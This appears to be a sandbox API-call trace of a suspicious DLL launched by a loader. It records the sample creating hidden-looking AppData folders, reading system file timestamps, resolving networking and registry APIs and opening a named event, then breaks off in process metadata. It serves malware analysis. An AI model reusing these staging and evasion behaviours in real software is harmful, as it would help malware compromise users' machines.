0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.809] GetLastError () returned 0x0 [0035.809] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.810] SetLastError (dwErrCode=0x0) [0035.810] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.811] GetLastError () returned 0x0 [0035.811] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.812] SetLastError (dwErrCode=0x0) [0035.812] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.813] GetLastError () returned 0x0 [0035.813] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.814] GetLastError () returned 0x0 [0035.814] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.815] SetLastError (dwErrCode=0x0) [0035.815] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.816] GetLastError () returned 0x0 [0035.816] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.817] SetLastError (dwErrCode=0x0) [0035.817] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.818] SetLastError (dwErrCode=0x0) [0035.818] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.819] SetLastError (dwErrCode=0x0) [0035.819] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.820] GetLastError () returned 0x0 [0035.820] SetLastError (dwErrCode=0x0) [0035.821] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.821] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.821] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.821] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef8a8 | out: lpSystemTimeAsFileTime=0x1ef8a8*(dwLowDateTime=0xe309dd70, dwHighDateTime=0x1d3dfba)) [0035.822] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef7e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.822] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetLastError () returned 0x0 [0035.822] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.822] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.822] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.822] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.822] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.822] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.822] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.822] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.823] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.823] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.823] GetLastError () returned 0xb7 [0035.823] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.823] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.823] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.823] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.823] wsprintfA (in: param_1=0x1ef548, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.823] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.823] wsprintfA (in: param_1=0x1ef444, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.823] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.823] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.823] CloseHandle (hObject=0x74) returned 1 [0035.823] GetLastError () returned 0x0 [0035.823] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.823] GetLastError () returned 0x0 [0035.823] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.824] GetSystemDirectoryA (in: lpBuffer=0x1ef548, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.824] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.824] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.824] CloseHandle (hObject=0x74) returned 1 [0035.824] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.824] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.824] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.825] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.825] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.825] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.826] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.826] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.826] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.826] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.826] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.827] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.827] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.827] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.827] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.827] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.827] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.827] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.827] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.828] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.828] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.828] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.828] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.828] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.828] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.828] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.828] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.830] HeapDestroy (hHeap=0x230000) returned 1 Process: id = "62" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f380" os_pid = "0xd74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 